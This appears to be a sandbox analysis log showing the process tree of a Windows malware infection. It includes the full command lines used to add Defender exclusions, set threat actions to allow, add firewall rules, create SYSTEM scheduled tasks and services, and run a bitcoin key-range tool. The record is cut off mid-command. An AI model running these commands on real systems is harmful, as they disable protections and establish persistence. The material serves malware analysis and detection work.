C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 8446⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 8005⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\t0YOUEnK5pL6C8GDHLibwFYX.exe"C:\Users\Admin\Pictures\t0YOUEnK5pL6C8GDHLibwFYX.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\t0YOUEnK5pL6C8GDHLibwFYX.exe"C:\Users\Admin\Pictures\t0YOUEnK5pL6C8GDHLibwFYX.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 7965⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\s2lEWgUzRd8LtHLxZSHixsV3.exe"C:\Users\Admin\Pictures\s2lEWgUzRd8LtHLxZSHixsV3.exe"4⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\CM2bPe31SJJfResknagjdh0V.exe"C:\Users\Admin\Pictures\CM2bPe31SJJfResknagjdh0V.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\Pictures\CM2bPe31SJJfResknagjdh0V.exeC:\Users\Admin\Pictures\CM2bPe31SJJfResknagjdh0V.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x298,0x29c,0x2a0,0x278,0x2a4,0x6b96e1d0,0x6b96e1dc,0x6b96e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CM2bPe31SJJfResknagjdh0V.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CM2bPe31SJJfResknagjdh0V.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Pictures\CM2bPe31SJJfResknagjdh0V.exe"C:\Users\Admin\Pictures\CM2bPe31SJJfResknagjdh0V.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4148 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240424020352" --session-guid=8360d9b1-c8ce-4b4a-9784-c89f73e9be7c --server-tracking-blob="MmM5MGMyYTRiMmY4ZTM5ZDZiN2E0NWZhNTJkOWEzZjI3MzRkMjZkZjFhNDk2ZjQyZTYzMjQ4NWQzOWVkZWMyZjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzOTI0MjIyLjE1ODQiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNWU2NjI5MDgtNzhmMC00ZjUyLWJmOGItMDY4MWRlMTQ1ZTRkIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=60040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\CM2bPe31SJJfResknagjdh0V.exeC:\Users\Admin\Pictures\CM2bPe31SJJfResknagjdh0V.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x2a8,0x2ac,0x2b0,0x278,0x2b4,0x6adfe1d0,0x6adfe1dc,0x6adfe1e86⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240203521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240203521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240203521\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240203521\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240203521\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240203521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x856038,0x856044,0x8560506⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
C:\Users\Admin\Pictures\qdu7H5KJU3EBeUJArM2f6QLF.exe"C:\Users\Admin\Pictures\qdu7H5KJU3EBeUJArM2f6QLF.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSFD66.tmp\Install.exe.\Install.exe /nxdidQZJ "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 02:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ByMblhl.exe\" em /MDsite_idNLP 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "3⤵
-
C:\Windows\SysWOW64\sc.exeSc delete GameServerClient4⤵
- Launches sc.exe
-
-
C:\Program Files (x86)\GameServerClient\GameService.exeGameService remove GameServerClient confirm4⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameServerClient\GameService.exeGameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"4⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameServerClient\GameService.exeGameService start GameServerClient4⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "3⤵
-
C:\Windows\SysWOW64\sc.exeSc delete GameServerClientC4⤵
- Launches sc.exe
-
-
C:\Program Files (x86)\GameServerClient\GameService.exeGameService remove GameServerClientC confirm4⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameServerClient\GameService.exeGameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"4⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameServerClient\GameService.exeGameService start GameServerClientC4⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "3⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5448 -ip 54481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6004 -ip 60041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4672 -ip 46721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 232 -ip 2321⤵
-
C:\Program Files (x86)\GameServerClient\GameService.exe"C:\Program Files (x86)\GameServerClient\GameService.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵
- Executes dropped EXE
-
C:\Windows\Temp\387821.exe"C:\Windows\Temp\387821.exe" --list-devices3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4340 -ip 43401⤵
-
C:\Program Files (x86)\GameServerClient\GameService.exe"C:\Program Files (x86)\GameServerClient\GameService.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵
- Executes dropped EXE
-
C:\Windows\Temp\448458.exe"C:\Windows\Temp\448458.exe" --coin BTC -m ADDRESSES -t 0 --range 380ae9a4a20000000:380ae9a4a40000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4500 -ip 45001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 880 -ip 8801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5608 -ip 56081⤵
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 768 -ip 7681⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ByMblhl.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ByMblhl.exe em /MDsite_idNLP 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 